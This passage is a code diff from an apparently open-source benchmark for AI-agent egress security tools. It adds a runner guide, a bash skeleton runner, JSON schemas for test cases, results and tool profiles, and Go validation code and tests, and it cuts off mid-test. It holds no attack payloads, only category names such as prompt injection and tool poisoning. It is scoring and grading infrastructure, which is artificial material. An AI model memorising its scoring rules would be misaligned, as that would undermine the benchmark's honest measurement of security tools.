+| Observation | Verdict |
+|-------------|---------|
+| Message not forwarded | `block` |
+| JSON-RPC error response with deny code | `block` |
+| Process exits with non-zero status | `block` |
+| Message forwarded unchanged | `allow` |
+| Transport failure | `error` |
+
+### Response scanning cases
+
+Response cases (`input_type: response_content`) include a `response_body` in the payload. These are harder to test because you need to simulate a server returning that content. Options:
+
+- Start a local HTTP server that returns the `response_body`
+- Use your tool's API directly if it has a scan-content endpoint
+- Mark as `not_applicable` in v1 and add support later
+
+### Cases you cannot handle
+
+If your runner does not support a transport or input type, emit `not_applicable` with a reason. This is normal. The Pipelock reference runner (v1) only supports `fetch_proxy` and marks everything else `not_applicable`.
+
+Do not fake results. If you cannot observe the verdict, say so.
+
+## Step 4: Validate your output
+
+### Check JSONL format
+
+Each line of your runner's stdout must be valid JSON with the required fields:
+
+```bash
+# Run your runner, capture output
+bash run.sh /path/to/your-tool > results.jsonl 2>summary.txt
+
+# Verify every line is valid JSON
+jq empty results.jsonl
+
+# Check required fields exist on every line
+jq -e 'has("case_id", "tool", "tool_version", "expected_verdict", "actual_verdict", "score", "evidence")' results.jsonl > /dev/null
+```
+
+### Check verdicts are valid
+
+```bash
+# All actual_verdict values must be one of: block, allow, not_applicable, error
+jq -r '.actual_verdict' results.jsonl | sort -u
+# Expected output: some subset of {allow, block, error, not_applicable}
+
+# All score values must be one of: pass, fail, not_applicable, error
+jq -r '.score' results.jsonl | sort -u
+```
+
+### Check scoring is correct
+
+```bash
+# Every case where actual == expected should be "pass"
+jq -r 'select(.actual_verdict == .expected_verdict and .score != "pass" and .score != "not_applicable") | .case_id' results.jsonl
+# Should print nothing
+
+# Every case where actual != expected (and neither is error/na) should be "fail"
+jq -r 'select(.actual_verdict != .expected_verdict and .actual_verdict != "error" and .actual_verdict != "not_applicable" and .score != "fail") | .case_id' results.jsonl
+# Should print nothing
+```
+
+### Check case coverage
+
+```bash
+# Total cases in corpus
+find ../../cases -name '*.json' -type f | wc -l
+
+# Total results emitted
+wc -l < results.jsonl
+
+# These should match
+```
+
+## Common mistakes
+
+**Claiming capabilities you do not test.** If your tool claims `mcp_chain` but your runner does not support `mcp_stdio`, those cases will try to run and produce `error` instead of `not_applicable`. Either support the transport or remove the claim.
+
+**Hardcoding verdicts.** Every verdict must come from observing your tool's actual behavior. If you return `block` without sending the request through your tool, the result is meaningless.
+
+**Mixing stdout and stderr.** JSONL goes to stdout. Status messages, progress, and summaries go to stderr. If you print status to stdout, the JSONL will be unparseable.
+
+**Forgetting benign cases.** Add `benign` to your `claims` array. If you skip it, all false-positive test cases are marked `not_applicable` and your results will not show whether your tool over-blocks.
+
+## Reference
+
+- [docs/RUNNER.md](../../docs/RUNNER.md): the formal runner contract
+- [docs/SPEC.md](../../docs/SPEC.md): case schema and field definitions
+- [docs/SCORING.md](../../docs/SCORING.md): scoring model
+- [examples/pipelock/](../pipelock/): reference runner implementation

--- a/examples/runner-template/skeleton.sh
+++ b/examples/runner-template/skeleton.sh
@@ -1,0 +1,207 @@
+#!/usr/bin/env bash
+# Skeleton runner for agent-egress-bench
+#
+# Copy this file and tool-profile-template.json to examples/your-tool/
+# and fill in the TODOs.
+#
+# Usage: bash skeleton.sh [tool-binary] [cases-dir]
+#
+# Output: JSONL to stdout (one result per case), summary to stderr.
+# See docs/RUNNER.md for the full output contract.
+
+set -euo pipefail
+
+# --- Configuration ---
+TOOL_BINARY="${1:-your-tool}"
+CASES_DIR="${2:-../../cases}"
+SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+PROFILE="$SCRIPT_DIR/tool-profile.json"
+
+# --- Prerequisites ---
+command -v jq >/dev/null 2>&1 || { echo "error: jq required" >&2; exit 1; }
+[ -f "$PROFILE" ] || { echo "error: tool profile not found: $PROFILE" >&2; exit 1; }
+
+# Read tool identity from profile
+TOOL=$(jq -r '.tool' "$PROFILE")
+TOOL_VERSION=$(jq -r '.tool_version' "$PROFILE")
+CLAIMS=$(jq -r '.claims[]' "$PROFILE")
+SUPPORTS=$(jq -r '.supports | to_entries[] | select(.value == true) | .key' "$PROFILE")
+
+# --- Applicability check ---
+# This function is complete. Copy it as-is.
+# Returns 0 if the case applies to this tool, 1 if not.
+check_applicable() {
+    local case_file="$1"
+
+    # Every capability_tag must be in the tool's claims
+    local tags
+    tags=$(jq -r '.capability_tags[]' "$case_file")
+    for tag in $tags; do
+        if ! echo "$CLAIMS" | grep -qx "$tag"; then
+            return 1
+        fi
+    done
+
+    # Every requires entry must be in the tool's supports
+    local reqs
+    reqs=$(jq -r '.requires[]' "$case_file" 2>/dev/null)
+    for req in $reqs; do
+        [ -z "$req" ] && continue
+        if ! echo "$SUPPORTS" | grep -qx "$req"; then
+            return 1
+        fi
+    done
+
+    return 0
+}
+
+# --- Emit a single JSONL result line to stdout ---
+# This function is complete. Copy it as-is.
+emit_result() {
+    local case_id="$1" expected="$2" actual="$3" score="$4" evidence="$5" notes="$6"
+    jq -n \
+        --arg case_id "$case_id" \
+        --arg tool "$TOOL" \
+        --arg tool_version "$TOOL_VERSION" \
+        --arg expected "$expected" \
+        --arg actual "$actual" \
+        --arg score "$score" \
+        --argjson evidence "$evidence" \
+        --arg notes "$notes" \
+        '{case_id: $case_id, tool: $tool, tool_version: $tool_version,
+          expected_verdict: $expected, actual_verdict: $actual, score: $score,
+          evidence: $evidence, notes: $notes}'
+}
+
+# ============================================================
+# TODO 1: Start your tool
+# ============================================================
+# Launch your tool and wait for it to be ready.
+# Example for an HTTP proxy tool:
+#
+#   PORT=18899
+#   "$TOOL_BINARY" start --listen "127.0.0.1:$PORT" &
+#   TOOL_PID=$!
+#   trap "kill $TOOL_PID 2>/dev/null; wait $TOOL_PID 2>/dev/null" EXIT
+#
+#   # Wait for readiness (adjust the health check URL for your tool)
+#   for i in $(seq 1 30); do
+#       if curl -sf "http://127.0.0.1:$PORT/health" >/dev/null 2>&1; then
+#           break
+#       fi
+#       if [ "$i" -eq 30 ]; then
+#           echo "error: tool did not start within 30 seconds" >&2
+#           exit 1
+#       fi
+#       sleep 1
+#   done
+#   echo "tool ready on port $PORT" >&2
+#
+# For MCP proxy tools, you may not need a background process.
+# Instead, you might pipe messages through your tool per-case.
+# ============================================================
+
+echo "error: TODO 1 not implemented: start your tool" >&2
+exit 1
+
+# --- Main loop ---
+passed=0
+failed=0
+na=0
+errors=0
+total=0
+
+while read -r case_file; do
+    total=$((total + 1))
+    case_id=$(jq -r '.id' "$case_file")
+    expected=$(jq -r '.expected_verdict' "$case_file")
+    input_type=$(jq -r '.input_type' "$case_file")
+    transport=$(jq -r '.transport' "$case_file")
+
+    # --- Applicability check (profile-based) ---
+    if ! check_applicable "$case_file"; then
+        emit_result "$case_id" "$expected" "not_applicable" "not_applicable" \
+            '{"reason": "case requires capabilities not claimed by tool profile"}' ""
+        na=$((na + 1))
+        echo "  SKIP  $case_id (not applicable)" >&2
+        continue
+    fi
+
+    # ============================================================
+    # TODO 2: Check transport support
+    # ============================================================
+    # Skip cases with transports your runner does not handle yet.
+    # Even if your tool supports a transport, your runner might not
+    # have the plumbing for it. Be honest about what works.
+    #
+    # Example (fetch_proxy only):
+    #
+    #   case "$transport" in
+    #       fetch_proxy) ;;  # supported by this runner
+    #       *)
+    #           emit_result "$case_id" "$expected" "not_applicable" "not_applicable" \
+    #               "{\"reason\": \"transport '$transport' not supported by runner\"}" ""
+    #           na=$((na + 1))
+    #           echo "  SKIP  $case_id (transport: $transport)" >&2
+    #           continue
+    #           ;;
+    #   esac
+    # ============================================================
+
+    # ============================================================
+    # TODO 3: Feed the case to your tool and observe the verdict
+    # ============================================================
+    # This is where your tool-specific logic goes. Read the payload,
+    # build a request, send it through your tool, observe the result.
+    #
+    # For HTTP proxy tools:
+    #   1. Extract method, url, headers, body from the payload
+    #   2. Build a curl command targeting your proxy
+    #   3. Check the HTTP status code
+    #   4. Map status to verdict:
+    #      - 403 or 502 with block marker => "block"
+    #      - 200, 301, 404, etc.          => "allow"
+    #      - 000 (connection failed)      => "error"
+    #
+    # For MCP proxy tools:
+    #   1. Extract jsonrpc_messages from the payload
+    #   2. Pipe each message through your MCP proxy
+    #   3. Check if the message was forwarded or blocked
+    #   4. Map the observation to verdict:
+    #      - Message withheld or error response => "block"
+    #      - Message forwarded                  => "allow"
+    #      - Transport failure                  => "error"
+    #
+    # For response scanning:
+    #   1. Start a local HTTP server returning the response_body
+    #   2. Fetch through your proxy
+    #   3. Check if the response was flagged
+    #
+    # Replace the placeholder below with your implementation.
+    # ============================================================
+
+    actual_verdict="error"
+    evidence='{"reason": "TODO: implement tool-specific verdict observation"}'
+
+    # --- Score the result ---
+    if [ "$actual_verdict" = "error" ]; then
+        score="error"
+    elif [ "$actual_verdict" = "$expected" ]; then
+        score="pass"
+    else
+        score="fail"
+    fi
+
+    emit_result "$case_id" "$expected" "$actual_verdict" "$score" "$evidence" ""
+
+    case "$score" in
+        pass)           passed=$((passed + 1));  echo "  PASS  $case_id" >&2 ;;
+        fail)           failed=$((failed + 1));  echo "  FAIL  $case_id" >&2 ;;
+        not_applicable) na=$((na + 1));          echo "  SKIP  $case_id" >&2 ;;
+        error)          errors=$((errors + 1));  echo "  ERR   $case_id" >&2 ;;
+    esac
+done < <(find "$CASES_DIR" -name '*.json' -type f | sort)
+
+# --- Summary ---
+echo "" >&2
+echo "results: $passed passed, $failed failed, $na not_applicable, $errors errors ($total total)" >&2

--- a/examples/runner-template/tool-profile-template.json
+++ b/examples/runner-template/tool-profile-template.json
@@ -1,0 +1,20 @@
+{
+  "schema_version": 1,
+  "tool": "YOUR_TOOL_NAME",
+  "tool_version": "0.0.0",
+  "runner_version": "v1",
+  "claims": [],
+  "supports": {
+    "fetch_proxy": false,
+    "http_proxy": false,
+    "mcp_stdio": false,
+    "mcp_http": false,
+    "websocket": false,
+    "tls_interception": false,
+    "request_body_scanning": false,
+    "header_scanning": false,
+    "response_scanning": false,
+    "mcp_tool_baseline": false,
+    "mcp_chain_memory": false
+  }
+}

--- a/schemas/case.schema.json
+++ b/schemas/case.schema.json
@@ -1,0 +1,173 @@
+{
+  "$schema": "http://json-schema.org/draft-07/schema#",
+  "$id": "https://github.com/luckyPipewrench/agent-egress-bench/schemas/case.schema.json",
+  "title": "agent-egress-bench Case",
+  "description": "A single test case for evaluating AI agent egress security tools. Each case specifies an input, the expected verdict (block or allow), and the capabilities required to evaluate it.",
+  "type": "object",
+  "required": [
+    "schema_version",
+    "id",
+    "category",
+    "title",
+    "description",
+    "input_type",
+    "transport",
+    "payload",
+    "expected_verdict",
+    "severity",
+    "capability_tags",
+    "requires",
+    "false_positive_risk",
+    "why_expected"
+  ],
+  "additionalProperties": false,
+  "properties": {
+    "schema_version": {
+      "type": "integer",
+      "const": 1,
+      "description": "Schema version. Must be 1."
+    },
+    "id": {
+      "type": "string",
+      "description": "Unique identifier. Immutable once published."
+    },
+    "category": {
+      "type": "string",
+      "enum": [
+        "url",
+        "request_body",
+        "headers",
+        "response_fetch",
+        "response_mitm",
+        "mcp_input",
+        "mcp_tool",
+        "mcp_chain"
+      ],
+      "description": "Attack surface category."
+    },
+    "title": {
+      "type": "string",
+      "minLength": 1,
+      "description": "Short human-readable title."
+    },
+    "description": {
+      "type": "string",
+      "minLength": 1,
+      "description": "What the case tests."
+    },
+    "input_type": {
+      "type": "string",
+      "enum": [
+        "url",
+        "request_body",
+        "header",
+        "response_content",
+        "mcp_tool_call",
+        "mcp_tool_result",
+        "mcp_tool_definition",
+        "mcp_tool_sequence"
+      ],
+      "description": "Type of input being tested."
+    },
+    "transport": {
+      "type": "string",
+      "enum": [
+        "fetch_proxy",
+        "http_proxy",
+        "mcp_stdio",
+        "mcp_http",
+        "websocket"
+      ],
+      "description": "Expected transport mechanism."
+    },
+    "payload": {
+      "type": "object",
+      "description": "Test payload. Format varies by input_type."
+    },
+    "expected_verdict": {
+      "type": "string",
+      "enum": ["block", "allow"],
+      "description": "Expected tool verdict. v1 is binary (no warn)."
+    },
+    "severity": {
+      "type": "string",
+      "enum": ["critical", "high", "medium", "low"],
+      "description": "Impact severity of the attack being tested."
+    },
+    "capability_tags": {
+      "type": "array",
+      "minItems": 1,
+      "items": {
+        "type": "string",
+        "enum": [
+          "url_dlp",
+          "request_body_dlp",
+          "header_dlp",
+          "response_injection",
+          "mcp_input_scan",
+          "mcp_tool_poison",
+          "mcp_chain",
+          "ssrf",
+          "domain_blocklist",
+          "entropy",
+          "encoding_evasion",
+          "benign"
+        ]
+      },
+      "description": "What capabilities this case exercises. Used for reporting and applicability."
+    },
+    "requires": {
+      "type": "array",
+      "items": {
+        "type": "string",
+        "enum": [
+          "tls_interception",
+          "request_body_scanning",
+          "header_scanning",
+          "response_scanning",
+          "mcp_tool_baseline",
+          "mcp_chain_memory"
+        ]
+      },
+      "description": "Runtime prerequisites. If a tool's profile does not satisfy all entries, the case is not_applicable."
+    },
+    "false_positive_risk": {
+      "type": "string",
+      "enum": ["low", "medium", "high"],
+      "description": "Likelihood of incorrect blocking on benign input."
+    },
+    "why_expected": {
+      "type": "string",
+      "minLength": 1,
+      "description": "Machine-readable reason for expected verdict."
+    },
+    "safe_example": {
+      "type": "boolean",
+      "description": "Must be true for benign cases (expected_verdict: allow)."
+    },
+    "notes": {
+      "type": "string",
+      "description": "Human context about the case."
+    },
+    "source": {
+      "type": "string",
+      "description": "Reference or citation."
+    }
+  },
+  "if": {
+    "properties": {
+      "expected_verdict": {
+        "const": "allow"
+      }
+    },
+    "required": ["expected_verdict"]
+  },
+  "then": {
+    "required": ["safe_example"],
+    "properties": {
+      "safe_example": {
+        "const": true
+      }
+    }
+  }
+}

--- a/schemas/result.schema.json
+++ b/schemas/result.schema.json
@@ -1,0 +1,55 @@
+{
+  "$schema": "http://json-schema.org/draft-07/schema#",
+  "$id": "https://github.com/luckyPipewrench/agent-egress-bench/schemas/result.schema.json",
+  "title": "agent-egress-bench Result",
+  "description": "A single result line from a benchmark runner (JSONL output). One result per case, recording the expected verdict, actual verdict, score, and tool-specific evidence.",
+  "type": "object",
+  "required": [
+    "case_id",
+    "tool",
+    "tool_version",
+    "expected_verdict",
+    "actual_verdict",
+    "score",
+    "evidence",
+    "notes"
+  ],
+  "additionalProperties": false,
+  "properties": {
+    "case_id": {
+      "type": "string",
+      "description": "The case ID from the case file."
+    },
+    "tool": {
+      "type": "string",
+      "description": "Tool name from the tool profile."
+    },
+    "tool_version": {
+      "type": "string",
+      "description": "Tool version from the tool profile."
+    },
+    "expected_verdict": {
+      "type": "string",
+      "enum": ["block", "allow"],
+      "description": "Expected verdict from the case file."
+    },
+    "actual_verdict": {
+      "type": "string",
+      "enum": ["block", "allow", "not_applicable", "error"],
+      "description": "Verdict observed by the runner. not_applicable if the case does not apply to this tool. error if the runner or tool failed."
+    },
+    "score": {
+      "type": "string",
+      "enum": ["pass", "fail", "not_applicable", "error"],
+      "description": "pass if actual matches expected, fail if not, not_applicable if case was skipped, error if runner/tool failure."
+    },
+    "evidence": {
+      "type": "object",
+      "description": "Tool-specific evidence supporting the verdict. Freeform structure."
+    },
+    "notes": {
+      "type": "string",
+      "description": "Optional context about the result."
+    }
+  }
+}

--- a/schemas/tool-profile.schema.json
+++ b/schemas/tool-profile.schema.json
@@ -1,0 +1,120 @@
+{
+  "$schema": "http://json-schema.org/draft-07/schema#",
+  "$id": "https://github.com/luckyPipewrench/agent-egress-bench/schemas/tool-profile.schema.json",
+  "title": "agent-egress-bench Tool Profile",
+  "description": "Declares a tool's claimed capabilities and supported transports/features. Used by runners to determine case applicability before execution.",
+  "type": "object",
+  "required": [
+    "schema_version",
+    "tool",
+    "tool_version",
+    "runner_version",
+    "claims",
+    "supports"
+  ],
+  "additionalProperties": false,
+  "properties": {
+    "schema_version": {
+      "type": "integer",
+      "const": 1,
+      "description": "Schema version. Must be 1."
+    },
+    "tool": {
+      "type": "string",
+      "description": "Tool name."
+    },
+    "tool_version": {
+      "type": "string",
+      "description": "Version of the tool being profiled."
+    },
+    "runner_version": {
+      "type": "string",
+      "description": "Version of the runner used with this profile."
+    },
+    "claims": {
+      "type": "array",
+      "items": {
+        "type": "string",
+        "enum": [
+          "url_dlp",
+          "request_body_dlp",
+          "header_dlp",
+          "response_injection",
+          "mcp_input_scan",
+          "mcp_tool_poison",
+          "mcp_chain",
+          "ssrf",
+          "domain_blocklist",
+          "entropy",
+          "encoding_evasion",
+          "benign"
+        ]
+      },
+      "description": "Capability tags this tool claims to support. Cases with tags outside this list are not_applicable."
+    },
+    "supports": {
+      "type": "object",
+      "description": "Transport mechanisms and runtime features the tool supports.",
+      "required": [
+        "fetch_proxy",
+        "http_proxy",
+        "mcp_stdio",
+        "mcp_http",
+        "websocket",
+        "tls_interception",
+        "request_body_scanning",
+        "header_scanning",
+        "response_scanning",
+        "mcp_tool_baseline",
+        "mcp_chain_memory"
+      ],
+      "additionalProperties": false,
+      "properties": {
+        "fetch_proxy": {
+          "type": "boolean",
+          "description": "Tool supports fetch proxy transport."
+        },
+        "http_proxy": {
+          "type": "boolean",
+          "description": "Tool supports HTTP forward proxy (CONNECT) transport."
+        },
+        "mcp_stdio": {
+          "type": "boolean",
+          "description": "Tool supports MCP stdio proxy transport."
+        },
+        "mcp_http": {
+          "type": "boolean",
+          "description": "Tool supports MCP streamable HTTP transport."
+        },
+        "websocket": {
+          "type": "boolean",
+          "description": "Tool supports WebSocket proxy transport."
+        },
+        "tls_interception": {
+          "type": "boolean",
+          "description": "Tool supports TLS interception for CONNECT tunnel scanning."
+        },
+        "request_body_scanning": {
+          "type": "boolean",
+          "description": "Tool scans HTTP request bodies for secrets and exfiltration."
+        },
+        "header_scanning": {
+          "type": "boolean",
+          "description": "Tool scans HTTP headers for secrets and exfiltration."
+        },
+        "response_scanning": {
+          "type": "boolean",
+          "description": "Tool scans HTTP response content for prompt injection."
+        },
+        "mcp_tool_baseline": {
+          "type": "boolean",
+          "description": "Tool maintains tool description baselines for rug-pull detection."
+        },
+        "mcp_chain_memory": {
+          "type": "boolean",
+          "description": "Tool tracks tool call sequences for chain detection."
+        }
+      }
+    }
+  }
+}

--- a/validate/main.go
+++ b/validate/main.go
@@ -3,6 +3,7 @@
 package main
 
 import (
+	"bufio"
 	"encoding/json"
 	"fmt"
 	"os"
@@ -54,6 +55,21 @@ var (
 		"mcp_tool_baseline": true, "mcp_chain_memory": true,
 	}
 
+	validActualVerdicts = map[string]bool{
+		"block": true, "allow": true, "not_applicable": true, "error": true,
+	}
+
+	validScores = map[string]bool{
+		"pass": true, "fail": true, "not_applicable": true, "error": true,
+	}
+
+	validSupportsKeys = map[string]bool{
+		"fetch_proxy": true, "http_proxy": true, "mcp_stdio": true, "mcp_http": true,
+		"websocket": true, "tls_interception": true, "request_body_scanning": true,
+		"header_scanning": true, "response_scanning": true, "mcp_tool_baseline": true,
+		"mcp_chain_memory": true,
+	}
+
 	// Valid category → input_type combinations per SPEC.md.
 	validCategoryInputType = map[string][]string{
 		"url":            {"url"},
@@ -103,14 +119,50 @@ type Case struct {
 	Source          string                 `json:"source"`
 }
 
+const usageText = `usage: validate <command> <target>
+
+commands:
+  cases   <dir>    validate case JSON files in a directory
+  results <file>   validate a runner results JSONL file
+  profile <file>   validate a tool profile JSON file
+
+for backwards compatibility, 'validate <dir>' works as 'validate cases <dir>'.
+`
+
 func main() {
 	if len(os.Args) < 2 {
-		fmt.Fprintf(os.Stderr, "usage: validate <cases-directory>\n")
+		fmt.Fprint(os.Stderr, usageText)
 		os.Exit(1)
 	}
-	casesDir := os.Args[1]
 
-	ids := make(map[string]string) // id -> file path
+	subcmd := os.Args[1]
+	switch subcmd {
+	case "cases":
+		if len(os.Args) < 3 {
+			fmt.Fprintf(os.Stderr, "usage: validate cases <cases-directory>\n")
+			os.Exit(1)
+		}
+		os.Exit(runCases(os.Args[2]))
+	case "results":
+		if len(os.Args) < 3 {
+			fmt.Fprintf(os.Stderr, "usage: validate results <results-file>\n")
+			os.Exit(1)
+		}
+		os.Exit(runResults(os.Args[2]))
+	case "profile":
+		if len(os.Args) < 3 {
+			fmt.Fprintf(os.Stderr, "usage: validate profile <profile-file>\n")
+			os.Exit(1)
+		}
+		os.Exit(runProfile(os.Args[2]))
+	default:
+		// Backward compatibility: treat bare argument as cases directory.
+		os.Exit(runCases(subcmd))
+	}
+}
+
+func runCases(casesDir string) int {
+	ids := make(map[string]string)
 	var errors []string
 	fileCount := 0
 
@@ -121,7 +173,6 @@ func main() {
 		if info.IsDir() || !strings.HasSuffix(info.Name(), ".json") {
 			return nil
 		}
-
 		fileCount++
 		fileErrors := validateFile(path, ids)
 		errors = append(errors, fileErrors...)
@@ -129,23 +180,47 @@ func main() {
 	})
 	if err != nil {
 		fmt.Fprintf(os.Stderr, "error walking cases directory: %v\n", err)
-		os.Exit(1)
+		return 1
 	}
-
 	if fileCount == 0 {
 		fmt.Fprintf(os.Stderr, "no case files found in %s\n", casesDir)
-		os.Exit(1)
+		return 1
 	}
-
 	if len(errors) > 0 {
 		fmt.Fprintf(os.Stderr, "validation failed with %d error(s):\n\n", len(errors))
 		for _, e := range errors {
 			fmt.Fprintf(os.Stderr, "  %s\n", e)
 		}
-		os.Exit(1)
+		return 1
 	}
-
 	fmt.Printf("validated %d case files. all passed.\n", fileCount)
+	return 0
+}
+
+func runResults(path string) int {
+	errors := validateResultsFile(path)
+	if len(errors) > 0 {
+		fmt.Fprintf(os.Stderr, "validation failed with %d error(s):\n\n", len(errors))
+		for _, e := range errors {
+			fmt.Fprintf(os.Stderr, "  %s\n", e)
+		}
+		return 1
+	}
+	fmt.Println("results file validated. all passed.")
+	return 0
+}
+
+func runProfile(path string) int {
+	errors := validateProfileFile(path)
+	if len(errors) > 0 {
+		fmt.Fprintf(os.Stderr, "validation failed with %d error(s):\n\n", len(errors))
+		for _, e := range errors {
+			fmt.Fprintf(os.Stderr, "  %s\n", e)
+		}
+		return 1
+	}
+	fmt.Println("profile file validated. all passed.")
+	return 0
 }
 
 func validateFile(path string, ids map[string]string) []string {
@@ -161,7 +236,9 @@ func validateFile(path string, ids map[string]string) []string {
 	}
 
 	var c Case
-	if err := json.Unmarshal(data, &c); err != nil {
+	dec := json.NewDecoder(strings.NewReader(string(data)))
+	dec.DisallowUnknownFields()
+	if err := dec.Decode(&c); err != nil {
 		addErr(fmt.Sprintf("JSON parse error: %v", err))
 		return errors
 	}
@@ -386,4 +463,186 @@ func contains(slice []string, val string) bool {
 		}
 	}
 	return false
+}
+
+// ResultLine represents a single line in a runner results JSONL file.
+type ResultLine struct {
+	CaseID          string                 `json:"case_id"`
+	Tool            string                 `json:"tool"`
+	ToolVersion     string                 `json:"tool_version"`
+	ExpectedVerdict string                 `json:"expected_verdict"`
+	ActualVerdict   string                 `json:"actual_verdict"`
+	Score           string                 `json:"score"`
+	Evidence        map[string]interface{} `json:"evidence"`
+	Notes           *string                `json:"notes"`
+}
+
+func validateResultLine(lineNum int, r ResultLine) []string {
+	var errors []string
+	addErr := func(msg string) {
+		errors = append(errors, fmt.Sprintf("line %d: %s", lineNum, msg))
+	}
+
+	if r.CaseID == "" {
+		addErr("missing case_id")
+	}
+	if r.Tool == "" {
+		addErr("missing tool")
+	}
+	if r.ToolVersion == "" {
+		addErr("missing tool_version")
+	}
+	if !validVerdicts[r.ExpectedVerdict] {
+		addErr(fmt.Sprintf("invalid expected_verdict: %q (must be block or allow)", r.ExpectedVerdict))
+	}
+	if !validActualVerdicts[r.ActualVerdict] {
+		addErr(fmt.Sprintf("invalid actual_verdict: %q", r.ActualVerdict))
+	}
+	if !validScores[r.Score] {
+		addErr(fmt.Sprintf("invalid score: %q", r.Score))
+	}
+	if r.Evidence == nil {
+		addErr("missing evidence (must be an object)")
+	}
+	if r.Notes == nil {
+		addErr("missing notes (must be a string, use empty string if no context)")
+	}
+
+	// Score consistency checks.
+	if validActualVerdicts[r.ActualVerdict] && validVerdicts[r.ExpectedVerdict] && validScores[r.Score] {
+		switch {
+		case r.ActualVerdict == r.ExpectedVerdict && r.Score != "pass":
+			addErr(fmt.Sprintf("inconsistent score: actual_verdict matches expected_verdict (%q) but score is %q (should be pass)",
+				r.ActualVerdict, r.Score))
+		case r.ActualVerdict == "not_applicable" && r.Score != "not_applicable":
+			addErr(fmt.Sprintf("inconsistent score: actual_verdict is not_applicable but score is %q (should be not_applicable)", r.Score))
+		case r.ActualVerdict == "error" && r.Score != "error":
+			addErr(fmt.Sprintf("inconsistent score: actual_verdict is error but score is %q (should be error)", r.Score))
+		}
+	}
+
+	return errors
+}
+
+func validateResultsFile(path string) []string {
+	f, err := os.Open(path)
+	if err != nil {
+		return []string{fmt.Sprintf("%s: read error: %v", path, err)}
+	}
+	defer f.Close()
+
+	var allErrors []string
+	seenIDs := make(map[string]int)
+	lineNum := 0
+	resultCount := 0
+
+	scanner := bufio.NewScanner(f)
+	for scanner.Scan() {
+		lineNum++
+		text := strings.TrimSpace(scanner.Text())
+		if text == "" {
+			continue
+		}
+		resultCount++
+
+		var r ResultLine
+		dec := json.NewDecoder(strings.NewReader(text))
+		dec.DisallowUnknownFields()
+		if err := dec.Decode(&r); err != nil {
+			allErrors = append(allErrors, fmt.Sprintf("line %d: JSON parse error: %v", lineNum, err))
+			continue
+		}
+
+		lineErrors := validateResultLine(lineNum, r)
+		allErrors = append(allErrors, lineErrors...)
+
+		if r.CaseID != "" {
+			if prevLine, exists := seenIDs[r.CaseID]; exists {
+				allErrors = append(allErrors, fmt.Sprintf("line %d: duplicate case_id %q (first seen on line %d)", lineNum, r.CaseID, prevLine))
+			} else {
+				seenIDs[r.CaseID] = lineNum
+			}
+		}
+	}
+
+	if err := scanner.Err(); err != nil {
+		allErrors = append(allErrors, fmt.Sprintf("%s: read error: %v", path, err))
+	}
+	if resultCount == 0 {
+		allErrors = append(allErrors, fmt.Sprintf("%s: file contains no result lines", path))
+	}
+
+	return allErrors
+}
+
+// Profile represents a tool profile JSON file.
+type Profile struct {
+	SchemaVersion int                    `json:"schema_version"`
+	Tool          string                 `json:"tool"`
+	ToolVersion   string                 `json:"tool_version"`
+	RunnerVersion string                 `json:"runner_version"`
+	Claims        []string               `json:"claims"`
+	Supports      map[string]interface{} `json:"supports"`
+}
+
+func validateProfile(p Profile) []string {
+	var errors []string
+
+	if p.SchemaVersion != 1 {
+		errors = append(errors, fmt.Sprintf("schema_version must be 1, got %d", p.SchemaVersion))
+	}
+	if p.Tool == "" {
+		errors = append(errors, "missing tool")
+	}
+	if p.ToolVersion == "" {
+		errors = append(errors, "missing tool_version")
+	}
+	if p.RunnerVersion == "" {
+		errors = append(errors, "missing runner_version")
+	}
+	if p.Claims == nil {
+		errors = append(errors, "missing claims (must be an array)")
+	}
+	for _, claim := range p.Claims {
+		if !validCapabilityTags[claim] {
+			errors = append(errors, fmt.Sprintf("invalid claim: %q", claim))
+		}
+	}
+	if p.Supports == nil {
+		errors = append(errors, "missing supports (must be an object)")
+	} else {
+		// Validate present keys.
+		for key, val := range p.Supports {
+			if !validSupportsKeys[key] {
+				errors = append(errors, fmt.Sprintf("invalid supports key: %q", key))
+			}
+			if _, isBool := val.(bool); !isBool {
+				errors = append(errors, fmt.Sprintf("supports.%s must be a boolean", key))
+			}
+		}
+		// Require all supports keys per schema.
+		for key := range validSupportsKeys {
+			if _, exists := p.Supports[key]; !exists {
+				errors = append(errors, fmt.Sprintf("missing required supports key: %q", key))
+			}
+		}
+	}
+
+	return errors
+}
+
+func validateProfileFile(path string) []string {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return []string{fmt.Sprintf("%s: read error: %v", path, err)}
+	}
+
+	var p Profile
+	dec := json.NewDecoder(strings.NewReader(string(data)))
+	dec.DisallowUnknownFields()
+	if err := dec.Decode(&p); err != nil {
+		return []string{fmt.Sprintf("%s: JSON parse error: %v", path, err)}
+	}
+
+	return validateProfile(p)
 }

--- a/validate/main_test.go
+++ b/validate/main_test.go
@@ -1175,3 +1175,265 @@ func searchStr(s, substr string) bool {
 	}
 	return false
 }
+
+// strPtr returns a pointer to a string value.
+func strPtr(s string) *string { return &s }
+
+// allSupportsKeys returns a supports map with all 11 required keys set to false.
+func allSupportsKeys() map[string]interface{} {
+	return map[string]interface{}{
+		"fetch_proxy": false, "http_proxy": false, "mcp_stdio": false,
+		"mcp_http": false, "websocket": false, "tls_interception": false,
+		"request_body_scanning": false, "header_scanning": false,
+		"response_scanning": false, "mcp_tool_baseline": false,
+		"mcp_chain_memory": false,
+	}
+}
+
+// --- Result validation tests ---
+
+func TestResultValidation_ValidLine(t *testing.T) {
+	r := ResultLine{
+		CaseID: "test-001", Tool: "test", ToolVersion: "1.0",
+		ExpectedVerdict: "block", ActualVerdict: "block", Score: "pass",
+		Evidence: map[string]interface{}{"status": float64(403)}, Notes: strPtr(""),
+	}
+	errors := validateResultLine(1, r)
+	if len(errors) != 0 {
+		t.Fatalf("expected no errors, got: %v", errors)
+	}
+}
+
+func TestResultValidation_MissingFields(t *testing.T) {
+	r := ResultLine{} // all empty
+	errors := validateResultLine(1, r)
+	if len(errors) < 3 {
+		t.Fatalf("expected multiple errors for empty result line, got %d", len(errors))
+	}
+}
+
+func TestResultValidation_InconsistentScore(t *testing.T) {
+	tests := []struct {
+		name     string
+		actual   string
+		expected string
+		score    string
+		wantErr  bool
+	}{
+		{"match should be pass", "block", "block", "pass", false},
+		{"match but fail", "block", "block", "fail", true},
+		{"na verdict na score", "not_applicable", "block", "not_applicable", false},
+		{"na verdict wrong score", "not_applicable", "block", "pass", true},
+		{"error verdict error score", "error", "block", "error", false},
+		{"error verdict wrong score", "error", "block", "pass", true},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			r := ResultLine{
+				CaseID: "t", Tool: "t", ToolVersion: "1",
